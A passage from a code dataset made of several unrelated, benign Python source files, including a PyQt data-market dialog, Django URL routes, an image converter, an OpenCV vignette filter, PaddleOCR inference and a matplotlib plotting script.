range(len(flines)):\n if i == 0:\n if(split_str==None):\n format_header = flines[0]\n elif(split_str==\" \"):\n format_header = flines[0].split() \n else:\n format_header = flines[0].strip().split(split_str) \n else:\n if(split_str==None):\n format_line = flines[i]\n elif(split_str==\" \"):\n format_line = flines[i].split() \n else:\n format_line = flines[i].strip().split(split_str)\n format_lines.append(format_line) \n else:\n QMessageBox.warning(self, \"warning\", \"unsupported format!\")\n return format_header, format_lines, fname[0]\n \n # pad every row of format_lines to the same length\n def align_lines(self, lines):\n max_len = len(lines[0])\n for line in lines:\n if(len(line) > max_len):\n max_len = 
len(line)\n for i in range(len(lines)):\n for j in range(len(lines[i]), max_len):\n lines[i].append(\"\") # pad with empty strings\n return lines\n\n\n## Release-datapkg page ###########################################################################################################\nclass Window_Middleman_Sub(QDialog):\n def __init__(self):\n super().__init__()\n # get the screen resolution\n self.desktop = QApplication.desktop()\n self.screenRect = self.desktop.screenGeometry()\n # set the window geometry\n self.HEIGHT = int(self.screenRect.height() * 0.4)\n self.WIDTH = int(self.screenRect.width() * 0.4)\n self.TOP = int(self.screenRect.height() * 0.3)\n self.LEFT = int(self.screenRect.width() * 0.3)\n # variables inherited from the parent window\n self.middleman_id = None\n # build this window's widgets\n self.Init_UI()\n\n def Init_UI(self):\n # window settings\n self.setGeometry(self.LEFT, self.TOP, self.WIDTH, self.HEIGHT) \n self.setWindowTitle('MiniDTM_Middleman_ReleasePkgs')\n self.setWindowIcon(QIcon(ICON_PATH))\n # background image\n palette = QPalette()\n pix=QPixmap(WELCOME_BG_PATH)\n pix = pix.scaled(self.width(),self.height())\n palette.setBrush(QPalette.Background, QBrush(pix))\n self.setPalette(palette)\n # name, accuracy, size, price and partition inputs, plus the generate button\n self.lineedit_name = QLineEdit(self)\n self.lineedit_name.setPlaceholderText(\"input name here\")\n self.lineedit_accuracy = QLineEdit(self)\n self.lineedit_accuracy.setPlaceholderText(\"input accuracy here\")\n self.lineedit_size = QLineEdit(self)\n self.lineedit_size.setPlaceholderText(\"input size here\")\n self.lineedit_price = QLineEdit(self)\n self.lineedit_price.setPlaceholderText(\"input price here\")\n self.lineedit_partition = QLineEdit(self)\n self.lineedit_partition.setPlaceholderText(\"input partition here\")\n self.bt_divide = QPushButton(\"Divide into sub pkgs\", self)\n self.bt_divide.clicked.connect(self.divide_datapkg)\n # show the split results and the confirm-release button\n self.lineedit_part1 = QLineEdit(self)\n self.lineedit_part2 = QLineEdit(self)\n self.lineedit_part3 = QLineEdit(self)\n self.lineedit_part4 = QLineEdit(self)\n self.lineedit_part5 = QLineEdit(self)\n self.bt_release_pkgs = QPushButton(\"Release Packages\", self)\n self.bt_release_pkgs.clicked.connect(self.release_pkgs)\n # layout\n vbox = QVBoxLayout()\n hbox1 = QHBoxLayout()\n hbox1.addWidget(self.lineedit_name)\n hbox1.addWidget(self.lineedit_accuracy)\n hbox1.addWidget(self.lineedit_size)\n vbox.addLayout(hbox1)\n hbox2 = QHBoxLayout()\n hbox2.addWidget(self.lineedit_price)\n hbox2.addWidget(self.lineedit_partition)\n hbox2.addWidget(self.bt_divide)\n vbox.addLayout(hbox2)\n vbox.addWidget(self.lineedit_part1)\n vbox.addWidget(self.lineedit_part2)\n vbox.addWidget(self.lineedit_part3)\n vbox.addWidget(self.lineedit_part4)\n vbox.addWidget(self.lineedit_part5)\n vbox.addWidget(self.bt_release_pkgs)\n self.setLayout(vbox)\n self.show()\n \n # automatically split into smaller sub-packages\n def divide_datapkg(self):\n # validate input\n self.lineedit_list = [self.lineedit_name, self.lineedit_accuracy, self.lineedit_size, self.lineedit_price, self.lineedit_partition]\n for lineedit in self.lineedit_list:\n if lineedit.text() == '':\n QMessageBox.warning(self, \"warning\", \"invalid input\")\n return 1\n # generate the partition\n self.partition = []\n for i in range(0, min(int(self.lineedit_partition.text()), 5)): # at most 5 groups\n accuracy = np.random.random() * float(self.lineedit_accuracy.text())\n size = np.random.random() * int(self.lineedit_size.text())\n how_big = (size*accuracy) / (int(self.lineedit_size.text())*float(self.lineedit_accuracy.text()))\n balance = -0.25*pow(how_big,2) + 2*how_big +0.25\n price = ( balance * float(self.lineedit_price.text()) )\n 
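# the quadratic 'balance' factor grows with how_big over [0, 1], so sub-packages that cover\n # more of the full set's size and accuracy are priced closer to the full asking price\n 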
item = {'accuracy':accuracy, 'size':size, 'price':price}\n self.partition.append(item)\n # show the partition\n self.lineedit_partition_list = [self.lineedit_part1, self.lineedit_part2, self.lineedit_part3, self.lineedit_part4, self.lineedit_part5]\n for i in range(len(self.partition)):\n self.lineedit_partition_list[i].setText('accuracy:'+str(self.partition[i]['accuracy'])+' size:'+str(self.partition[i]['size'])+' price:'+str(self.partition[i]['price']))\n \n # release the data packages\n def release_pkgs(self):\n row_list = ['name', 'size', 'accuracy', 'lastprice']\n for i in range(len(self.partition)):\n valuelist = [str(self.lineedit_name.text())+'_'+str(i), str(self.partition[i]['size']), str(self.partition[i]['accuracy']), str(self.partition[i]['price'])]\n db_add_one_row('market_datapkg', row_list, valuelist)\n print(\"release success\")\n self.close()","repo_name":"FlyTweety/MiniDTM","sub_path":"window_middleman.py","file_name":"window_middleman.py","file_ext":"py","file_size_in_byte":26867,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26728231433","text":"numbers = [1, 2, 3]\nstrings = ['hello', 'world']\nnames = [\"John\", \"Eric\", \"Jessica\"]\n\n# write your code here\nsecond_name = names[1]\n\n\n# this code should write out the filled arrays and the second name in the names list (Eric).\nprint(numbers)\nprint(strings)\nprint(\"The second name on the names list is %s\\n\" % second_name)\n\nrandom_text = \"It,h gIi nl ievhet afmoo nsge rtuhtea ecr\"\n\nprint(random_text[::2] + random_text[::-2])\n\njust_list = [1, 2, 3, 5, 8, 13, 21, 34, 55]\nprint(*just_list)\n\n\ndef recursion(nums):\n if isinstance(nums, int):\n print(f'{\" \"*(len(just_list) + 1)}{nums}')\n return\n elif not nums:\n return\n\n if len(nums) == 3:\n first, middle, last = nums\n else:\n first, *middle, last = nums\n print(f'{\" \" * (len(just_list) - len(nums))}{first}{\" \"*(len(nums)*2)}{last}')\n return recursion(middle)\n\n\nrecursion(just_list)\n","repo_name":"Dispoison/python-education","sub_path":"python/python-basics/lists.py","file_name":"lists.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25709712","text":"from django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n path('', views.home,name='home'),\n path('posts/', views.posting, name='posting'),\n path('viewpost/', views.viewpost,name='viewpost'),\n path('addpost', views.addpost,name='addpost'),\n path('delete/', views.deleteblog,name='delete'),\n path('register/',views.registerpage,name='register'),\n path('login/', views.loginpage,name='login'),\n path('logout/',views.logoutpage,name='logout'),\n path('login1/',views.loggin,name='loggin'),\n path('homee/', views.homee,name='homee'),\n \n]","repo_name":"AJTopisano/food-waste-management","sub_path":"uploader/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"74506114408","text":"import struct\r\nfrom PIL import Image\r\n\r\ndef binary_to_image(inputPath, width, height, outputPath):\r\n with open(inputPath, 'rb') as f:\r\n binary_data = f.read()\r\n\r\n pixel_data = []\r\n for i in range(0, len(binary_data), 2):\r\n # Read two bytes from the binary data (byte order assumed little-endian)\r\n pixel = struct.unpack('<H', binary_data[i:i+2])[0]\r\n\r\n # Extract the 4-bit RGB444 components\r\n r = (pixel >> 8) & 0xF\r\n g = (pixel >> 4) & 0xF\r\n b = pixel & 0xF\r\n\r\n # Scale the 4-bit components to 8-bit range (0-255)\r\n r = r * 17\r\n g = g * 17\r\n b = b * 17\r\n\r\n pixel_data.append((r, g, b))\r\n\r\n try:\r\n image = Image.new('RGB', (width, height))\r\n image.putdata(pixel_data)\r\n image.save(outputPath, 'PNG')\r\n except Exception as e:\r\n print(e)","repo_name":"xpawelsky/TheNationsDecompressor","sub_path":"bin2img.py","file_name":"bin2img.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10909874734","text":"import cv2\nimport numpy as np\n\nboat = cv2.imread('FishingBoat.jpg')\n\nrows, cols =boat.shape[:2]\n\n#Vignette Filter \n\n#Kernel Mask\nkernel_x=cv2.getGaussianKernel(int(1.4*cols),400)\nkernel_y=cv2.getGaussianKernel(int(1.4*rows),250)\nkernel = kernel_y*kernel_x.T\nmask = 255*kernel / np.linalg.norm(kernel)\nmask=mask[int(0*rows):int(1.0*rows),int(0.4*cols):]\n\noutput_vignette =np.copy(boat)\n\n#Applying mask to all channels of image\nfor i in range(3):\n\toutput_vignette[:,:,i] = output_vignette[:,:,i]*mask\ncv2.imshow('Original',boat)\ncv2.imshow('Vignette',output_vignette)\n\ncv2.imwrite('Focus_on_boat.jpg',output_vignette)\n\n#Contrast equalizer - Grayscale\n\noutput_vignette_gray=cv2.cvtColor(output_vignette,cv2.COLOR_BGR2GRAY)\n\nhisteq = cv2.equalizeHist(output_vignette_gray)\n\ncv2.imshow('Gray-vignette',output_vignette_gray)\ncv2.imshow('Vignette Equalised',histeq)\n\n\ncv2.imwrite('Focus_on_boat_equalised_gray.jpg',histeq )\n\n#Contrast equalizer - YUV\n\nboat_yuv=cv2.cvtColor(boat,cv2.COLOR_BGR2YUV)\n\n#Equalize intensity (Y) value\nboat_yuv[:,:,0] = cv2.equalizeHist(boat_yuv[:,:,0])\n\noutput_equalized_boat =cv2.cvtColor(boat_yuv, cv2.COLOR_YUV2BGR)\n\ncv2.imshow('Equalized Vignette Boat',output_equalized_boat)\ncv2.imwrite('Equalized_Vignette_Boat.jpg',output_equalized_boat)\n\ncv2.waitKey(0)\n\ncv2.destroyAllWindows()\n","repo_name":"chainspark/OpenCv_Applications","sub_path":"Convolution/Vignette Filter.py","file_name":"Vignette Filter.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27372451466","text":"# Declare the counting function\n\ndef counter(n_customers):\n adder = 0 # for summing the digits\n\n '''The list_of_groups dict records how many people are in each 
group.\n Example: {1: 3}. This means group 1 has 3 people.\n This approach makes the code easier to use later,\n since a dict is easier to work with when presenting the data\n or converting it to a JSON file'''\n list_of_groups = {0 : 0} \n\n # Loop that sums the digits\n for i in list(str(n_customers)):\n adder += int(i)\n\n # The variable sum holds the digit sum (the group)\n sum = adder\n \n # Check whether this number is already a key (does the group exist at all?)\n if sum in list_of_groups:\n # If the group exists, add one more customer to it\n list_of_groups[sum] += 1\n \n else:\n # If there is no such group, extend the dict and set the value to 1\n new_group = {sum : 1}\n list_of_groups.update(new_group)\n \n return list_of_groups\n\n# Call the function\ncounter(12345) # example input\n","repo_name":"bekarysibrashev/Task-for-recruiter-","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38648240132","text":"\r\nimport os\r\nimport sys\r\nos.environ[\"FLAGS_allocator_strategy\"] = 'auto_growth'\r\nos.environ[\"KMP_DUPLICATE_LIB_OK\"]=\"TRUE\"\r\nsys.path.append(\"..\\\\..\\\\\")\r\n\r\nimport cv2\r\nimport copy\r\nimport numpy as np\r\nimport logging\r\nimport utility as utility\r\nimport predict_rec as predict_rec\r\nimport predict_det as predict_det\r\nimport predict_cls as predict_cls\r\nfrom ppocr.utils.logging import get_logger\r\nfrom utility import get_rotate_crop_image\r\nlogger = get_logger()\r\n\r\n\r\nclass TextSystem(object):\r\n def __init__(self, args):\r\n if not args.show_log:\r\n logger.setLevel(logging.INFO)\r\n\r\n self.text_detector = predict_det.TextDetector(args)\r\n self.text_recognizer = predict_rec.TextRecognizer(args)\r\n self.use_angle_cls = args.use_angle_cls\r\n self.drop_score = args.drop_score\r\n if self.use_angle_cls:\r\n self.text_classifier = predict_cls.TextClassifier(args)\r\n\r\n def print_draw_crop_rec_res(self, img_crop_list, rec_res):\r\n bbox_num = len(img_crop_list)\r\n for bno in range(bbox_num):\r\n cv2.imwrite(\"./output/img_crop_%d.jpg\" % bno, img_crop_list[bno])\r\n logger.info(bno, rec_res[bno])\r\n\r\n def __call__(self, img, cls=True):\r\n ori_im = img.copy()\r\n dt_boxes, elapse = self.text_detector(img)\r\n\r\n logger.debug(\"dt_boxes num : {}, elapse : {}\".format(\r\n len(dt_boxes), elapse))\r\n if dt_boxes is None:\r\n return None, None\r\n img_crop_list = []\r\n\r\n dt_boxes = sorted_boxes(dt_boxes)\r\n\r\n for bno in range(len(dt_boxes)):\r\n tmp_box = copy.deepcopy(dt_boxes[bno])\r\n img_crop = get_rotate_crop_image(ori_im, tmp_box)\r\n img_crop_list.append(img_crop)\r\n if self.use_angle_cls and cls:\r\n img_crop_list, angle_list, elapse = self.text_classifier(\r\n img_crop_list)\r\n logger.debug(\"cls num : {}, elapse : {}\".format(\r\n len(img_crop_list), elapse))\r\n\r\n rec_res, elapse = self.text_recognizer(img_crop_list)\r\n logger.debug(\"rec_res num : {}, elapse : {}\".format(\r\n len(rec_res), elapse))\r\n # self.print_draw_crop_rec_res(img_crop_list, rec_res)\r\n filter_boxes, filter_rec_res = [], []\r\n for box, rec_result in zip(dt_boxes, rec_res):\r\n text, score = rec_result\r\n if score >= self.drop_score:\r\n filter_boxes.append(box)\r\n filter_rec_res.append(rec_result)\r\n return filter_boxes, filter_rec_res\r\n\r\n\r\ndef sorted_boxes(dt_boxes):\r\n \"\"\"\r\n Sort text boxes in order from top to bottom, left to right\r\n args:\r\n dt_boxes(array):detected text boxes 
with shape [4, 2]\r\n return:\r\n sorted boxes(array) with shape [4, 2]\r\n \"\"\"\r\n num_boxes = dt_boxes.shape[0]\r\n sorted_boxes = sorted(dt_boxes, key=lambda x: (x[0][1], x[0][0]))\r\n _boxes = list(sorted_boxes)\r\n\r\n for i in range(num_boxes - 1):\r\n if abs(_boxes[i + 1][0][1] - _boxes[i][0][1]) < 10 and \\\r\n (_boxes[i + 1][0][0] < _boxes[i][0][0]):\r\n tmp = _boxes[i]\r\n _boxes[i] = _boxes[i + 1]\r\n _boxes[i + 1] = tmp\r\n return _boxes\r\n\r\n\r\ndef main():\r\n args = utility.parse_args()\r\n args.image_dir=\"../../doc/imgs/11.jpg\" \r\n args.det_model_dir=\"../../models/ch_PP-OCRv2_det_infer/\"\r\n args.rec_model_dir=\"../../models/ch_PP-OCRv2_rec_infer/\"\r\n args.rec_char_dict_path=\"../../ppocr/utils/ppocr_keys_v1.txt\"\r\n args.use_angle_cls=False \r\n args.use_gpu=True\r\n\r\n \r\n text_sys = TextSystem(args)\r\n\r\n # warm up 10 times\r\n if 1:\r\n img = np.random.uniform(0, 255, [640, 640, 3]).astype(np.uint8)\r\n for i in range(10):\r\n res = text_sys(img)\r\n\r\n img = cv2.imread(args.image_dir)\r\n dt_boxes, rec_res = text_sys(img)\r\n for text, score in rec_res:\r\n logger.info(\"{}, {:.3f}\".format(text, score))\r\n src_im = img\r\n for box in dt_boxes:\r\n box = np.array(box).astype(np.int32).reshape(-1, 2)\r\n cv2.polylines(src_im, [box], True, color=(255, 255, 0), thickness=2)\r\n\r\n cv2.imwrite('./enpei.jpg',src_im)\r\n\r\n# main()\r\n\r\n","repo_name":"enpeizhao/CVprojects","sub_path":"codes/9.virtual reader/baidu_pp_ocr/tools/infer/predict_system.py","file_name":"predict_system.py","file_ext":"py","file_size_in_byte":4174,"program_lang":"python","lang":"en","doc_type":"code","stars":1748,"dataset":"github-code","pt":"53"} +{"seq_id":"2717323712","text":"def func_a(arr, n):\r\n new_list = []\r\n for i in arr:\r\n if i != n:\r\n new_list.append(i)\r\n else:\r\n continue\r\n return new_list\r\n\r\ndef func_b(a, b):\r\n if a >= b:\r\n return a - b\r\n else:\r\n return b - a\r\n\r\ndef func_c(arr):\r\n maximum = 0\r\n for i in arr:\r\n if i > maximum:\r\n maximum = i\r\n return maximum\r\n\r\ndef solution(visitor):\r\n visitor_2 = func_a(visitor,func_c(visitor))\r\n max_1 = func_c(visitor)\r\n max_2 = func_c(visitor_2)\r\n return func_b(max_1, max_2)\r\n\r\nprint(solution([10,20,30,40]))","repo_name":"seokju7/cospro-python","sub_path":"problem 13.py","file_name":"problem 13.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3763994581","text":"from logger import coil_logger\nimport torch.nn as nn\nimport torch\nimport importlib\nimport os\n\nfrom configs import g_conf\nfrom coilutils.general import command_number_to_index\n\nfrom .building_blocks import Branching\nfrom .building_blocks import FC\n\nclass CoILMemExtract(nn.Module):\n\n def __init__(self, params):\n\n super(CoILMemExtract, self).__init__()\n self.params = params\n number_first_layer_channels = 0\n\n for _, sizes in g_conf.SENSORS.items():\n number_first_layer_channels += sizes[0] * g_conf.ALL_FRAMES_INCLUDING_BLANK\n\n # Get one item from the dict\n sensor_input_shape = next(iter(g_conf.SENSORS.values()))\n sensor_input_shape = [number_first_layer_channels, sensor_input_shape[1],\n sensor_input_shape[2]]\n\n self.predicted_speed = 0\n\n if 'res' in params['perception']:\n resnet_module = importlib.import_module('network.models.building_blocks.resnet')\n resnet_module = getattr(resnet_module, params['perception']['res']['name'])\n self.perception = resnet_module(\n 
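# instantiate the backbone class resolved by name above; its num_classes\n                # sets the feature width consumed by the speed and control branches\n                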
pretrained=g_conf.PRE_TRAINED,\n input_channels=number_first_layer_channels,\n num_classes=params['perception']['res']['num_classes']\n )\n\n number_output_neurons = params['perception']['res']['num_classes']\n \n else:\n raise ValueError(\"perception type is not-defined\")\n\n\n self.speed_branch = FC(\n params={\n 'neurons': [number_output_neurons] \n + params['speed_branch']['fc']['neurons'] + [1],\n 'dropouts': params['speed_branch']['fc']['dropouts'] + [0.0],\n 'end_layer': True\n }\n )\n\n branch_fc_vector = []\n for i in range(params['branches']['number_of_branches']):\n branch_fc_vector.append(\n FC(\n params={\n 'neurons': [number_output_neurons]\n + params['branches']['fc']['neurons'] \n + [len(g_conf.TARGETS)],\n 'dropouts': params['branches']['fc']['dropouts'] + [0.0],\n 'end_layer': True\n }\n )\n )\n \n self.branches = Branching(branch_fc_vector)\n \n \n def forward(self, x):\n\n x, _ = self.perception(x)\n\n speed_branch_output = self.speed_branch(x)\n \n branch_outputs = self.branches(x)\n\n return branch_outputs + [speed_branch_output], x.detach()\n","repo_name":"linYDTHU/Resolving_copycat_problems_via_residual_prediction","sub_path":"network/models/coil_memory_extraction.py","file_name":"coil_memory_extraction.py","file_ext":"py","file_size_in_byte":2897,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"41757705182","text":"from email.headerregistry import Address\n\nfrom mailers.message import AddressList\n\n\ndef test_constructor() -> None:\n addresses = AddressList(\"Root \")\n assert addresses == \"Root \"\n\n addresses = AddressList(None)\n assert not addresses\n\n addresses = AddressList([\"root@localhost\", \"user@localhost\"])\n assert addresses == \"root@localhost, user@localhost\"\n\n addresses = AddressList(Address(addr_spec=\"root@localhost\"))\n assert addresses == \"root@localhost\"\n\n addresses = AddressList([Address(addr_spec=\"root@localhost\"), Address(addr_spec=\"user@localhost\")])\n assert addresses == \"root@localhost, user@localhost\"\n\n\ndef test_add() -> None:\n addresses = AddressList()\n addresses.add(\"root@localhost\", Address(addr_spec=\"user@localhost\"))\n assert addresses == \"root@localhost, user@localhost\"\n\n\ndef test_set() -> None:\n addresses = AddressList(\"root@localhost\")\n addresses.set(\"user@localhost\")\n assert addresses == \"user@localhost\"\n\n\ndef test_clear() -> None:\n addresses = AddressList(\"root@localhost\")\n addresses.clear()\n assert addresses.empty\n\n\ndef test_first() -> None:\n addresses = AddressList(\"root@localhost\")\n assert addresses.first\n assert addresses.first.addr_spec == \"root@localhost\"\n\n addresses = AddressList()\n assert addresses.first is None\n\n\ndef test_empty() -> None:\n addresses = AddressList()\n assert addresses.empty\n\n addresses.add(\"root@localhost\")\n assert not addresses.empty\n\n\ndef test_iterable() -> None:\n addresses = AddressList(\"root@localhost\")\n assert next(iter(addresses)).addr_spec == \"root@localhost\"\n\n\ndef test_length() -> None:\n addresses = AddressList(\"root@localhost\")\n assert len(addresses) == 1\n\n\ndef test_boolean() -> None:\n addresses = AddressList()\n assert not bool(addresses)\n\n addresses = AddressList(\"root@localhost\")\n assert bool(addresses)\n\n\ndef test_descriptor() -> None:\n class T:\n f = AddressList()\n\n instance = T()\n instance.f = \"root@localhost\"\n assert type(instance.f) == AddressList\n assert len(instance.f) == 1\n\n instance.f = 
Address(addr_spec=\"root@localhost\")\n    assert instance.f == \"root@localhost\"\n\n    instance.f = None\n    assert instance.f == \"\"\n","repo_name":"alex-oleshkevich/mailers","sub_path":"tests/test_address_list.py","file_name":"test_address_list.py","file_ext":"py","file_size_in_byte":2264,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"53"} {"seq_id":"10020022631","text":"\r\nfrom tkinter import *\r\nroot = Tk()\r\nroot.title('TV Show Recommendation System') \r\nroot.geometry(\"900x700\") \r\nroot.config(background = \"white\")\r\nw = Label(root, text ='Welcome to TV Show Analysis',bg = \"white\", font = \"100\").grid(row=0,column=1) \r\n#w.pack() \r\nLabel(root, text='Enter the title of TV shows',bg = \"white\").grid(row=1)\r\ne1 = Entry(root)\r\ne1.grid(row=1, column=1)\r\nbutton = Button(root, text='Search', width=25).grid(row=1,column=2)\r\ndef topTen():\r\n    a=10\r\nbutton1 = Button(root, text='Top 10 TV show',command=topTen, width=25).grid(row=2,column=0)\r\nbutton2 = Button(root, text='Top 10 Movies', width=25).grid(row=2,column=1)\r\nbutton3 = Button(root, text='Compare Two Shows', width=25).grid(row=2,column=2)\r\nbutton4 = Button(root, text='View Sentiment analysis data distributions', width=35).grid(row=2,column=3,padx = 5, pady = 10)\r\nbutton10 = Button(root, text='Exit', width=25, command=root.destroy).grid(row=10,column=1)\r\n#button.pack()\r\n\r\n \r\nroot.mainloop()\r\n","repo_name":"sanjayKumar-dev/TV-Show-Popularity-Analysis","sub_path":"interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"35082064031","text":"# Jonathan Oakey\r\n\r\n\r\nclass Predict_Emissions_From_Engine_Size:\r\n\r\n\r\n    def __init__(self):\r\n        # Import required libraries:\r\n        import pandas as pd\r\n        # Read the CSV file :\r\n        data = pd.read_csv(\"https://s3-api.us-geo.objectstorage.softlayer.net/cf-courses-data/CognitiveClass/ML0101ENv3/labs/FuelConsumptionCo2.csv\")\r\n        train_testing_data = self.generate_training_testing_data(data)\r\n        train = train_testing_data['train']\r\n        test = train_testing_data['test']\r\n        regr = self.create_and_plot_model(train)\r\n\r\n\r\n        while True:\r\n            print(\"\")\r\n            print(\"What would you like to do?\")\r\n            print('Choose from one of the choices below:')\r\n            print('Check Accuracy')\r\n            print('Make Predictions')\r\n            print('Explore Data')\r\n            print('Exit')\r\n            the_response = input()\r\n            if 'Exit' in the_response:\r\n                break\r\n            elif 'Check Accuracy' in the_response:\r\n                self.checking_accuracy(regr,test)\r\n            elif 'Make Predictions' in the_response:\r\n                self.making_predictions(regr)\r\n            elif 'Explore Data' in the_response:\r\n                self.explore_data(data)\r\n            else:\r\n                print('unknown response...try again')\r\n\r\n    def explore_data(self,data):\r\n        \r\n        import matplotlib.pyplot as plt\r\n        \r\n        # Let's select some features to explore more :\r\n        data = data[[\"ENGINESIZE\",\"CO2EMISSIONS\"]]\r\n        # ENGINESIZE vs CO2EMISSIONS:\r\n        plt.scatter(data[\"ENGINESIZE\"] , data[\"CO2EMISSIONS\"] , color=\"blue\")\r\n        plt.xlabel(\"ENGINESIZE\")\r\n        plt.ylabel(\"CO2EMISSIONS\")\r\n        plt.show()\r\n\r\n    def generate_training_testing_data(self,data):\r\n        train_testing_data = {}\r\n        # Generating training and testing data from our data:\r\n        # We are using 80% data for training.\r\n        train = data[:(int((len(data)*0.8)))]\r\n        test = data[(int((len(data)*0.8))):]\r\n        
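# Editor's note (not part of the original): this is a plain head/tail 80/20\r\n        # split with no shuffling; sklearn's train_test_split could randomize it.\r\n        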
train_testing_data['train'] = train\r\n        train_testing_data['test'] = test\r\n        return train_testing_data\r\n\r\n\r\n\r\n    def create_and_plot_model(self,train):\r\n        import numpy as np\r\n        import matplotlib.pyplot as plt\r\n        from sklearn import linear_model\r\n        model_data = {}\r\n        # Modeling:\r\n        # Using sklearn package to model data :\r\n        regr = linear_model.LinearRegression()\r\n        train_x = np.array(train[[\"ENGINESIZE\"]])\r\n        train_y = np.array(train[[\"CO2EMISSIONS\"]])\r\n        regr.fit(train_x,train_y)\r\n        # The coefficients:\r\n        print('Model Created')\r\n        print (\"coefficients : \",regr.coef_) #Slope\r\n        print (\"Intercept : \",regr.intercept_) #Intercept\r\n        # Plotting the regression line:\r\n        plt.scatter(train[\"ENGINESIZE\"], train[\"CO2EMISSIONS\"], color='blue')\r\n        plt.plot(train_x, regr.coef_*train_x + regr.intercept_, '-r')\r\n        plt.xlabel(\"Engine size\")\r\n        plt.ylabel(\"Emission\")\r\n        return regr\r\n\r\n\r\n\r\n    def get_regression_predictions(self,input_features,intercept,slope):\r\n        # Predicting values:\r\n        # Function for predicting future values :\r\n        predicted_values = input_features*slope + intercept\r\n        return predicted_values\r\n\r\n    def making_predictions(self,regr):\r\n        # Predicting emission for future car:\r\n        # my_engine_size = 3.5\r\n        print('enter an engine size (ex: 3.5)')\r\n        my_engine_size = input()\r\n        my_engine_size = float(my_engine_size)\r\n        estimated_emission = self.get_regression_predictions(my_engine_size,regr.intercept_[0],regr.coef_[0][0])\r\n        print (\"Estimated Emission :\",estimated_emission)\r\n\r\n\r\n    def checking_accuracy(self,regr,test):\r\n        # Checking various accuracy:\r\n        import numpy as np\r\n        from sklearn.metrics import r2_score\r\n        test_x = np.array(test[['ENGINESIZE']])\r\n        test_y = np.array(test[['CO2EMISSIONS']])\r\n        test_y_ = regr.predict(test_x)\r\n        print(\"Mean absolute error: %.2f\" % np.mean(np.absolute(test_y_ - test_y)))\r\n        print(\"Mean sum of squares (MSE): %.2f\" % np.mean((test_y_ - test_y) ** 2))\r\n        print(\"R2-score: %.2f\" % r2_score(test_y_ , test_y) )\r\n\r\n\r\n\r\n\r\nPredict_Emissions_From_Engine_Size()\r\n\r\n","repo_name":"jonoak/Predict_Emissions_From_Engine_Size","sub_path":"Predict_Emissions_From_Engine_Size.py","file_name":"Predict_Emissions_From_Engine_Size.py","file_ext":"py","file_size_in_byte":3896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"34177882402","text":"import numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\n\nfrom fig2_spline import get_feats, get_P\n\nmatplotlib.rcParams.update({'font.size': 22})\nmatplotlib.rcParams['pdf.fonttype'] = 42\nmatplotlib.rcParams['ps.fonttype'] = 42\n\n\ndef make_legend_arrow(legend, orig_handle,\n                      xdescent, ydescent,\n                      width, height, fontsize):\n    p = matplotlib.patches.FancyArrow(0, 0.5*height, width, 0, length_includes_head=True, head_width=0.75*height, color='black')\n    return p\n\n\ndef plot_augmentations_polar(S0, theta_star):\n    angles = np.r_[np.linspace(0, 2*np.pi, 1000), np.pi, np.pi/2, 3*np.pi/2]\n    fig, ax = plt.subplots(figsize=(6, 6))\n    bad_c = 'white'\n    good_c = 'C1'\n\n    ax.set_facecolor(bad_c)\n\n    def get_lhs_rhs(x):\n        rho = (np.inner(x, theta_star)) / np.maximum(np.inner(x, x), 1e-16)\n        lhs = rho**2 * S0.dot(x).dot(x)\n        rhs = 2 * rho * S0.dot(x).dot(theta_star)\n        return lhs, rhs\n\n    for angle in angles:\n        x1v = 2*np.pi * np.cos(angle)\n        x2v = 2*np.pi * np.sin(angle)\n        x = np.asarray([x1v, x2v])\n        lhs, rhs = get_lhs_rhs(x)\n\n        if rhs - lhs > -1e-10:\n            plt.plot([0, x1v], [0, x2v], color=good_c, zorder=0)\n    plt.plot([0],[0], 
color=good_c, zorder=0)\n plt.axis([-1, 1, -1, 1])\n arrow = plt.arrow(0, 0, theta_star[0], theta_star[1], width=0.02, alpha=1, length_includes_head=True, color='black', zorder=100)\n plt.legend([arrow],\n [r'$\\theta^*$'],\n loc=\"lower right\",\n handler_map={matplotlib.patches.FancyArrow : matplotlib.legend_handler.HandlerPatch(patch_func=make_legend_arrow),})\n ax = plt.gca()\n ax.spines['left'].set_position('zero')\n ax.spines['right'].set_color('none')\n ax.spines['bottom'].set_position('zero')\n ax.spines['top'].set_color('none')\n ax.xaxis.set_ticks_position('none')\n ax.yaxis.set_ticks_position('none')\n ax.set_yticklabels([])\n ax.set_xticklabels([])\n ax.text(0, 1.1, '$e_2$', horizontalalignment='center')\n ax.text(1.1, 0, '$e_1$', verticalalignment='center')\n\n\n##################\n# Figure 3\n##################\nmatplotlib.rcParams.update({'font.size': 28})\ntheta_star = np.asarray([1, 0.2])\nX = np.diag([1, 2])\nS0 = X.T @ X\nplot_augmentations_polar(S0, theta_star)\nplt.subplots_adjust(bottom=0.15, left=0.2)\nplt.savefig('flag_less_skew.png')\n\nmatplotlib.rcParams.update({'font.size': 28})\ntheta_star = np.asarray([1, 0.2])\nX = np.diag([1, 5])\nS0 = X.T @ X\nplot_augmentations_polar(S0, theta_star)\nplt.subplots_adjust(bottom=0.15, 